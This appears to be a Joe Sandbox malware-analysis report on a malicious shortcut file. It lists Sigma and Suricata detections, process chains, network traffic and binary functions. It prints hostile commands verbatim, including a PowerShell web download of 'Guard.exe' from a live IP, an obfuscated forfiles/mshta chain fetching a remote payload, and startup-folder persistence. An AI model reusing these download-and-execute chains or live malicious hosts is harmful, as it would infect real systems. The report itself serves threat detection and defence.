Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4136, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 5800, ProcessName: SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1260, TargetFilename: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4136, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 2108, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, ProcessId: 3620, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6632, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7712, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T21:00:18.291783+010028033053Unknown Traffic192.168.2.449733147.45.49.15580TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: R8CAg00Db8.lnkReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000003.00000003.1948118831.000002BB7FD94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947163594.000002BB7FD73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956099299.000002BB7FD66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948118831.000002BB7FD7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947191712.000002BB7FD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966337969.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948710988.000002BB7FCFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948672661.000002BB7FCEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957090898.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966912942.000002BB7FD69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947779722.000002BB7FCE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966416203.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947094973.000002BB7FD94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1965728895.000002B305580000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000003.00000003.1947163594.000002BB7FD73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956099299.000002BB7FD66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947191712.000002BB7FD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948710988.000002BB7FCFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948672661.000002BB7FCEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966912942.000002BB7FD69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947779722.000002BB7FCE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1965728895.000002B305580000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00007FF79F8EC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EBC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00007FF79F8F72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F71F4 FindFirstFileW,FindClose,10_2_00007FF79F8F71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B2F50 FindFirstFileExW,10_2_00007FF79F8B2F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00007FF79F8FA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F6428 FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF79F8F6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA350
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F14005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F14005
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_00F1494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_00F1CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD14 FindFirstFileW,FindClose,20_2_00F1CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F13CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F13CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A24005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_00A2494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_00A2CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD14 FindFirstFileW,FindClose,24_2_00A2CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A23CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 20:00:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 15 Dec 2024 10:29:42 GMTETag: "da2a8-6294c8abc9816"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /Marketing.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 147.45.49.155:80
Source: global trafficHTTP traffic detected: GET /ghep1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FE968 InternetQueryDataAvailable,InternetReadFile,10_2_00007FF79F8FE968
Source: global trafficHTTP traffic detected: GET /ghep1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Marketing.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.10.drString found in binary or memory: http://139.99.188.124/QWCheljD.txt
Source: PefjSkkhb.exe, 0000000A.00000002.1915362734.000001CB92638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/kiiMf
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
